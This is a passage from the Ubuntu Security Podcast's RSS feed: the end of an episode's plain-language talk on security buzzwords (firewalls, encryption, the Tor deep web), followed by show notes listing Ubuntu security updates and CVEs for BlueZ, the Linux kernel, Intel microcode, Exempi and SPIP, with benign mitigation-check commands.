allows you to filter and possibly block incoming and outgoing traffic in
your network. Through use of a firewall you can define that users in your
network can&rsquo;t access a specific website, or you can keep connections coming
from a specific IP address from ever being established with these same
users. It&rsquo;s an important job the one done by a firewall, however, it is not
100% hacker proof. A firewall does what it needs to do well, but it won&rsquo;t
save you from yourself, for example, if you decide to become the victim of
every phishing campaign happening out there. So&hellip;do you see that buzzword
right there: &ldquo;phishing&rdquo;? That is why I recommended you listen to the last
episode, because I explain what is phishing THERE. Moving on, if e-mail
service is allowed by the firewall, a hacker can try to get to the network
through it, and in that case, my friend, you are the weakest link, as said
hacker is expecting you to make the mistake that will allow them passage
when the firewall will not do so through other ports or services in the
network. Don&rsquo;t expect a wall to protect your network if your staff is
handing out keys to the building&rsquo;s backdoor to anyone that mentions that
they work there!!! I am adding firewalls here on this list because ever
since the dawn of time&hellip;or at least the dawn of my time&hellip;I see the word
firewall being thrown around in television shows, in presentations that
want to nudge cyber security a little bit, and even on the thoughts of
people who are wondering &ldquo;How did I get infected with malware, I have a
firewall!!!&rdquo;. So&hellip;yeah. Unfortunately the buzzword became a universal term
used to describe all software and defensive techniques, even if they are
not all the same. To make an analogy, a firewall is one fruit amongst the
huge selection of different fruits that exist in this beautiful world, but
people insist on calling all fruits &lsquo;firewalls&rsquo;. I am sure you can imagine
a situation where I give you a lime and call it an apple, and I am sure
that in your imagination you are not too pleased about the result once you
bite into that fruit expecting one thing and instead getting another. You
might feel a little &lsquo;sour&rsquo; should I decide to do such a thing. Haha, get
it? Bad jokes aside, it&rsquo;s important to understand what a firewall really is
and what it can actually do for you in terms of protecting your
network. Not all attacks are the same, so not all attacks will be stopped
by a firewall. If you go beyond the buzzword and beyond the beautiful wall
and fire icon - which at this point could be called a buzzicon - you start
to actually build a defense strategy that makes sense and is efficient for
your network, one that will include a firewall, BUT will not expect it to
defend the network, cook and wash your clothes all at the same
time. Therefore, the next time your hear someone in a show mentioning that
they have breached 50% of the firewall, remember your training, remember
what a firewall actually is, and remember that if you are able to bypass
the firewall, you either did it 100% or you simply didn&rsquo;t, and then relax
and laugh a little, because you used your knowledge to actually build a
defense strategy that even if an attacker bypasses the firewall by 100%,
you are able to prevent an attack from actually being successful with the
help of your other layers of defense. You fought valiantly firewall friend,
but not all threats are avoidable by you, and we know that now. We also
know now that movie security in movie networks are probably awful, because
they seem to only use a firewall to defend very important data, and the
firewall is most likely broken, being only 50% bypassed and all…geez, get a
grip, hollywood, or hacking might become TOO easy for those imaginary
hackers.</p>
<p>Buzzword #5: encryption&hellip;encrypting&hellip;encrypted&hellip;encrypt. This buzzword
is also one that I think can be considered a long-living buzzword. Data
encryption suffers from the same problem as firewalls in the sense that
people see it as a solution to all of their problems. Oh…and movies also
like to use the word a lot. &ldquo;If my data is encrypted it is completely
safe&rdquo;. Right? Wrong. What is encryption then, and what purpose does it
serve? When you encrypt your data, you are actually just encoding
it. Transforming it in such a way that whatever information is actually
imbued within it cannot be extracted because the data no longer represents
something that can be understood by a potential snooper of that data. One
encrypted character a day keeps the snooper away, or at least that is the
goal anyway. The main purpose of encryption is to maintain data
confidentiality, or, in other words, to prevent an unauthorized party from
getting access to the data that is going to be encrypted. Therefore,
encryption is a technique that will serve the purpose of encoding data in
such a way that it loses its meaning to whoever is not authorized to know
it. Who are the ones authorized? Those that have the decryption key&hellip;and
if that key is stolen or shared with someone it shouldn&rsquo;t be&hellip;well then
you can say goodbye to your expected confidentiality, as this new someone
can now decode the data and interpret it as you would. I guess what annoys
me a little bit about this buzzword is the fact that it is used to make
people feel completely safe even when the situation does not necessarily
guarantee this. The most simple example I can think of is VPNs. I see
advertisements for those all the time, and in these advertisements people
mention how VPNs will help you stay safe from hackers when you are browsing
online&hellip;and that is not completely true. It depends on what the hacker is
doing. If a hacker is trying to track you and figure out what you are doing
in the internet, that is, they are trying to snoop on your browsing
activities, then yes, a VPN, which will help you mask your tracks by adding
a layer of encryption to your traffic and acting as a middle man in your
communication with your destination, will indeed protect you. Think of it
as sending an encrypted letter to an intermediary courier. Only you and the
courier know the decryption key and so anyone that tries to intercept the
letter and does not have this key will be unable to do anything about
it. They don&rsquo;t know who is the actual destination of the letter nor do they
know what is the purpose of the letter, all they know is that the courier
will receive it and send it to the actual destination.  Encryption keeps
your communication confidential. Once it gets to the courier, the courier
decrypts it and then sends it to the actual destination and your snooper
can&rsquo;t know it is from you because the courier is also sending and receiving
data from a bunch of people, and that courier has promised secrecy to you,
meaning, it promised it won&rsquo;t tell others which is your letter. Anyway, now
think about the situation where you willingly decide to access a malicious
website through a VPN. There is no encryption that will save you from your
bad choices here. An encrypted conversation with an attacker is still a
conversation with an attacker, and an encrypted malware sent to you through
your VPN tunnel will still execute in your machine should you tell it
to. So once again I tell you, use encryption but know its purpose! It is
not because a website is HTTPS, or, in other words, it is not because a
website has that little lock in the top left corner, that you are protected
from all evil lurking on the internet. All it means is that data you send
to that website&rsquo;s server will be sent to it encrypted. This in turn means
that your login credentials won&rsquo;t be out in the open, being sent in clear
text through the network, free to be accessed by anyone that chooses to
sniff the data in any point of the path from source to destination. They
will be encrypted, and whoever comes across this data in transit won&rsquo;t be
able to know the true contents unless they have the decryption key, which
is shared between you and the server only. However, you can decide to send
encrypted credentials to an attacker as well. Malicious websites can be
HTTPS. In fact, attackers take advantage of the fact that people blindly
trust HTTPS websites because they are &ldquo;encrypted&rdquo; and make fake HTTPS bank
pages in order to steal credentials. Phishing attacks, remember those? So
here we have a situation where the buzz in the word is being harmful for
those that don&rsquo;t actually try to understand the meaning behind it. When you
want to make sure a website is safe, not only check for the tiny lock in
the top-left corner of the browser, also do check if the website&rsquo;s
certificate actually identifies that page as being authentic, as being
owned and provided by the entity that you believe it to be. So&hellip;yeah. I
guess final thoughts on this once again are: encryption is fine when you
don&rsquo;t forget to combine….it with other security measures. I wanted to make
a cool rhyme, but that didn&rsquo;t work out. Oh well&hellip;onto the next buzzword!</p>
<p>Buzzword #6: the deep web. Ooooh, spooky! Once again we are in &ldquo;buzzword
because of the movies&rdquo; territory. Hacker, firewall, encrypted data, network
breach, deep web. Oh, and a guy wearing a black hoodie. The cliché buzzword
we see getting thrown around every time someone wants to talk about cyber
security and sound mysterious while doing it. I mean&hellip;I can&rsquo;t really blame
them, as it is human nature to enjoy mysteries and to want to solve
them. So, I guess if you are in the entertainment industry, throwing out
the word &ldquo;deep web&rdquo; around is indeed one of the ways to go. However, if you
are an IT professional, blindly trusting that what you see in movies is how
things actually work is definitely not. Does the deep web contain
mysterious websites and crazy mind bending information? Yes. Is it a
blackhole where only the most courageous may enter and the most bizarre may
stay? No. No! A bunch of the websites you have in the surface web also
exist in the deep web! If you want, you can do your regular browsing but
using the roads - let&rsquo;s call them that for now - of the deep web
instead. All you have to do is download the software tool that will allow
you to access it. The most well known tool to do so is the Tor browser,
which will give you access to the Tor network, where lot&rsquo;s of deep web
websites are hosted. So let&rsquo;s talk a little bit about the Tor network and
try to understand what is the oh-so-mysterious deep web and why you can&rsquo;t
access it by simply typing &ldquo;Take me to the deep web&rdquo; on a search engine in
your regular browser. Think about the Internet as being the entire
planet. Earth as you know it. Everyone and everything we know and can
access is inside the planet&hellip;and for the smarty pants that will try to say
&ldquo;but what about space travel???&rdquo;, don&rsquo;t be a downer and destroy my
analogy. Use your imagination and PRETEND like all we know is inside the
planet only, which is the ONLY thing we have access to. The planet is like
the entire Internet. Now imagine all of the roads on the planet. You can
drive through them and go anywhere you want, the same way your data can
flow through the Internet and reach several destinations which will provide
you with services such as web browsing and e-mail sending. Consider now,
however, that a group of servers, or, to stick to the analogy, a group of
destinations for road trips, decide to bundle together and create their own
underground secret routes and make themselves and their services accessible
only to travelers which use those secret routes. The regular roads that
would lead you to them are destroyed and there are now a few single regular
roads that lead to the entry-points of the underground tunnels. Anyone can
enter the underground tunnels if they wish to and use the tunnels to reach
those &ldquo;secret&rdquo; destinations, as can anyone download a Tor browser and find
websites which are deb web or even darknet services. However, if you want
to reach your destination you must use the tunnel, and you can no longer
use maps to reach this destination, since in the underground tunnels they
provide you with no maps as they do in the surface roads. No maps so that
the destinations remain well hidden within this secret underground road
network, and so that they can &ldquo;change their location&rdquo; or &ldquo;stop existing&rdquo;
whenever they wish to do so. No records means no tracking. When entering
the underground tunnels you set up three intermediate tunnel only
destinations that will help you reach your desired end point, let’s
consider those toll booths. The first one is where you will always stop at
the beginning of your journey, the second one will connect you to the last
one, which in turn will be the one that will finally tell you which road to
follow to access the destination which will provide you with the service
you wish to access. Think now that these intermediate points recognize you
by your car color. A very specific color you and each toll booth attendant
have previously decided on, the moment you knew they would be your
intermediate stops. So the first point recognizes a red car, the second a
blue car, and the last a green car. I am using simple colors here, but to
amuse your own imagination, you can think of it as a very specific shade of
red that cannot be replicated by anyone else, meaning it will identify you
uniquely to that specific toll booth. Same goes to the blue and to the
green. Before passing through your underground toll booths you paint your
car green, then blue and then red. When you get to the first mark, the toll
booth guard recognizes the red hue of your car and identifies you as a
valid passenger. It removes the red hue and you tell it your next toll
booth stop. It forwards you in that direction, meaning it shows you the way
to the blue toll booth. You go to the blue tollbooth and the same thing
happens. It recognizes the blue hue, removes it and sees that you are going
to the green toll booth, and it directs you there. Finally, when you reach
green they do the same, but they finally send you to your final
destination. Notice that this allows you to stay anonymous because you got
in in a red car and got to your destination in a green colored car. The red
toll booth does not know your final tollbooth was green, knowing only you
went to blue, and the green does not know your starting point was red,
knowing only you came from blue. Blue does not know your starting point nor
you final destination, knowing only that you came from red and left for
green. Going back to that final destination: your final destination can be
outside of the underground tunnels and back on the main roads. You used the
underground tunnels just so that people who see you get in through the
tunnels in a red car don&rsquo;t follow you and don&rsquo;t know where you got
out. Your final destination, however, can also be inside the tunnel
network. If that is the case, you will never go to the actual destination,
because underground tunnel services establish an intermediate rendezvous
point for communication and service offering instead of letting you reach
them at their actual location. Knowing the secret name of the service, you
are able to obtain information on what places are set as these rendezvous
points. So&hellip;leaving the analogy for a little bit&hellip;this is basically what
the Tor network is and what at least part of the deep web is. The Tor
network is an established network inside the internet. The secret
underground roads inside of the planet&rsquo;s entire road network. It still uses
roads, meaning, it still uses IP addresses and establishes communication
between devices using regular means in layers under the application layer
itself. However, it defines a private communication method within the
public internet. Anyone can download a Tor browser and access Tor websites,
which would be part of the deep web websites, however, to do so, you need
to know the website&rsquo;s address in the format that will be recognized in the
Tor network. Unlike the surface web where you register the mapping of your
website name and the IP address of the server that will host that website
in order for people to be able to find it without having to memorize a
complex number to do so - thank you DNS -, in the Tor network what you will
know is the name of the onion service and the location where this service
meets clients wishing to access it. Tor nodes, our toll booths, can then
route you to this destination, where you can introduce yourself to the
server and then set a rendezvous point which is where the rest of the
communication between you will actually happen. In the Tor network, it is
not as simple as the definition of an explicit mapping that says &ldquo;oh, you
want to get to this place? Here is the address!&rdquo;. Nope. Here, everything is
done covertly and secretly. You have a meeting place to define the
definitive meeting place. So maybe it is a little bit mysterious after
all. I&rsquo;ll give the movies that. Of course you can use the Tor network, our
secret underground tunnels, to access a regular surface web website if you
want to. It is not necessary, but a lot of people do it because it allows
for anonymous browsing. Our underground tunnels won&rsquo;t allow for
identification of who sent a message that is reaching a specific
destination, remember the whole car painting process and the colorful toll
booths? Well, in technical terms, Tor uses layers of encryption and
intermediate proxy nodes in order to stop someone snooping from knowing who
is the original sender of a message arriving at a certain
destination. ENCRYPTION being used to assist in keeping anonymity and to
maintain confidentiality of the data that is being transferred by whoever
is using the Tor network. So yeah&hellip;kind of a long explanation, but
demystifying it, this is what the deep web is: encryption, intermediary
nodes, regular websites, creepy websites, and lots of bureaucracy to get
you to your final destination. Oh, wait&hellip;that&rsquo;s just part of it, since Tor
is only one of the many underground tunnel networks that exists out
there. There are others with different rules, different entry regulations
and different functionalities and purposes in general. I decided to tell
you about how the most famous one of these secret networks within the
network works so that you can get the genral iceberg idea of it. However,
lady Internet is a vast place, filled with opportunity to create and embed,
so secret networks which can not have their services accessed through the
regular WWW URL are plenty out there, all you need is the will and the
knowledge of the way to explore it! Oh, and the permission as well. I am
not condoning you committing a crime here.</p>
<p>Anyway, I think that is enough of me talking for one episode. Tune in for
next time where we will talk about our last three buzzwords for this
series, which I might add, are three giants&hellip;all of them suggested by my
Ubuntu Security Team peers of course! Feel free to share your thoughts on
today&rsquo;s episode and buzzwords in any of our social media channels, I would
love to hear what you have to say about it! For now, I bid you all farewell
and until next time! Bye!</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E166.mp3" length="19680947" type="audio/mpeg" /><itunes:duration>1912</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 165
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-165/</link>
          <pubDate>Fri, 24 Jun 2022 16:02:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1ef7b560fd187efb9b0e6167b27197acafc0c1675211b6c0e42a2a62aa199c79a72f21eca4fad4a58d4fe76f9272715ee24e53757f4c6e0e26e4223f4388ae56</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 165</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Camila dives into the details on some of the most prolific
  buzzwords flying around the cybersecurity community, plus we cover security
  updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Camila dives into the details on some of the most prolific
  buzzwords flying around the cybersecurity community, plus we cover security
  updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and
  more.
  </itunes:summary>
        <description>  This week Camila dives into the details on some of the most prolific
  buzzwords flying around the cybersecurity community, plus we cover security
  updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and
  more.
  </description>
        <googleplay:description>  This week Camila dives into the details on some of the most prolific
  buzzwords flying around the cybersecurity community, plus we cover security
  updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Camila dives into the details on some of the most prolific
buzzwords flying around the cybersecurity community, plus we cover security
updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>58 unique CVEs addressed</p>
<h3 id="usn-5481-1-bluez-vulnerabilities-00-38">[<a href="https://ubuntu.com/security/notices/USN-5481-1">USN-5481-1</a>] BlueZ vulnerabilities [00:38]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS)</li>
<li>Not all vulnerabilities / security issues get CVEs ;)</li>
<li>Possible OOB read in A/V Remote Control Protocol profile</li>
<li>Possible OOB write and a possible 1-byte buffer overflow in A/V
Distribution Transport Protocol profile</li>
</ul>
<h3 id="lsn-0087-1-linux-kernel-vulnerability-01-20">[<a href="https://ubuntu.com/security/notices/LSN-0087-1">LSN-0087-1</a>] Linux kernel vulnerability [01:20]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1972">CVE-2022-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different netfilter issues
<ul>
<li>OOB write (can be mitigated by disabling unprivileged user namespaces)</li>
<li>UAF</li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.2</td>
          <td>87.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>87.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>87.1</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>oem</td>
          <td>—</td>
          <td>—</td>
          <td>87.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-5485-1-linux-kernel-vulnerabilities-02-14">[<a href="https://ubuntu.com/security/notices/USN-5485-1">USN-5485-1</a>] Linux kernel vulnerabilities [02:14]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All GA and some HWE kernels</li>
<li>Intel MMIO stale data
<ul>
<li>Mentioned in passing in last week&rsquo;s episode - kernels are now available
as well as microcode to mitigate these issues - once have installed the
new kernel can see if vulnerable via a new sysfs file:</li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cat /sys/devices/system/cpu/vulnerabilities/mmio_stale_data
</span></span></code></pre></div><ul>
<li>Will display either <code>Not affected</code>, <code>Vulnerable</code> (no mitigation),
<code>Vulnerable: Clear CPU buffers attempted, no microcode</code> or <code>Mitigation: Clear CPU buffers</code> if have mitigation enabled and microcode to support
it</li>
<li>Will also display info on SMT since if vulnerable then need to disable
SMT to be completely protected</li>
<li>Mitigation comes with a performance hit so if not doing untrusted
virtualisation can perhaps disable it (but please do your own research
as needed 😉) via kernel command-line option:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mmio_stale_data<span style="color:#f92672">=</span>full <span style="color:#75715e"># or &#39;full,nosmt&#39;  or &#39;off&#39;</span>
</span></span></code></pre></div><ul>
<li>To have complete mitigation need to enable clear buffers <strong>and</strong> disable
SMT on affected CPUs</li>
<li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/Documentation/admin-guide/hw-vuln/processor_mmio_stale_data.rst">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/Documentation/admin-guide/hw-vuln/processor_mmio_stale_data.rst</a></li>
</ul>
<h3 id="usn-5484-1-linux-kernel-vulnerabilities-05-22">[<a href="https://ubuntu.com/security/notices/USN-5484-1">USN-5484-1</a>] Linux kernel vulnerabilities [05:22]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39713">CVE-2021-39713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13 GA kernel for 14.04 ESM</li>
<li>2 recent high priority kernel vulns:
<ul>
<li>UAF due to race condition in network packet scheduler</li>
<li>Secure boot bypass through <code>kgdb</code></li>
</ul>
</li>
<li>Intel MMIO stale data</li>
</ul>
<h3 id="usn-5486-1-intel-microcode-vulnerabilities-06-01">[<a href="https://ubuntu.com/security/notices/USN-5486-1">USN-5486-1</a>] Intel Microcode vulnerabilities [06:01]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21151">CVE-2022-21151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21127">CVE-2022-21127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33120">CVE-2021-33120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33117">CVE-2021-33117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0146">CVE-2021-0146</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0145">CVE-2021-0145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0127">CVE-2021-0127</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest intel-microcode release (20220510 / SPU 2022.1)</li>
<li>Originally mentioned 3 CVEs at release back in May</li>
<li>Now Intel have mentioned this is also required for mitigation of the MMIO
stale data issues as well</li>
</ul>
<h3 id="usn-5483-1-exempi-vulnerabilities-07-08">[<a href="https://ubuntu.com/security/notices/USN-5483-1">USN-5483-1</a>] Exempi vulnerabilities [07:08]</h3>
<ul>
<li>22 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42532">CVE-2021-42532</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42531">CVE-2021-42531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42530">CVE-2021-42530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42529">CVE-2021-42529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42528">CVE-2021-42528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40732">CVE-2021-40732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40716">CVE-2021-40716</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39847">CVE-2021-39847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36064">CVE-2021-36064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36058">CVE-2021-36058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36056">CVE-2021-36056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36055">CVE-2021-36055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36054">CVE-2021-36054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36053">CVE-2021-36053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36052">CVE-2021-36052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36051">CVE-2021-36051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36050">CVE-2021-36050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36048">CVE-2021-36048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36047">CVE-2021-36047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36046">CVE-2021-36046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36045">CVE-2021-36045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12648">CVE-2018-12648</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>xmp metadata parsing library
<ul>
<li>used by EOG, tracker, nemo and others</li>
</ul>
</li>
<li>Usual mix of issues from memory unsafe languages - Stack and heap-based
OOB reads / writes, integer overflows etc
<ul>
<li>RCE / DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-5482-1-spip-vulnerabilities-07-55">[<a href="https://ubuntu.com/security/notices/USN-5482-1">USN-5482-1</a>] SPIP vulnerabilities [07:55]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26847">CVE-2022-26847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26846">CVE-2022-26846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44123">CVE-2021-44123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44122">CVE-2021-44122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44120">CVE-2021-44120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44118">CVE-2021-44118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28984">CVE-2020-28984</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks again to Luís Infante da Câmara for preparing the update for
bionic</li>
<li>website engine
<ul>
<li>CSRF, XSS, info disclosure, RCE</li>
</ul>
</li>
</ul>
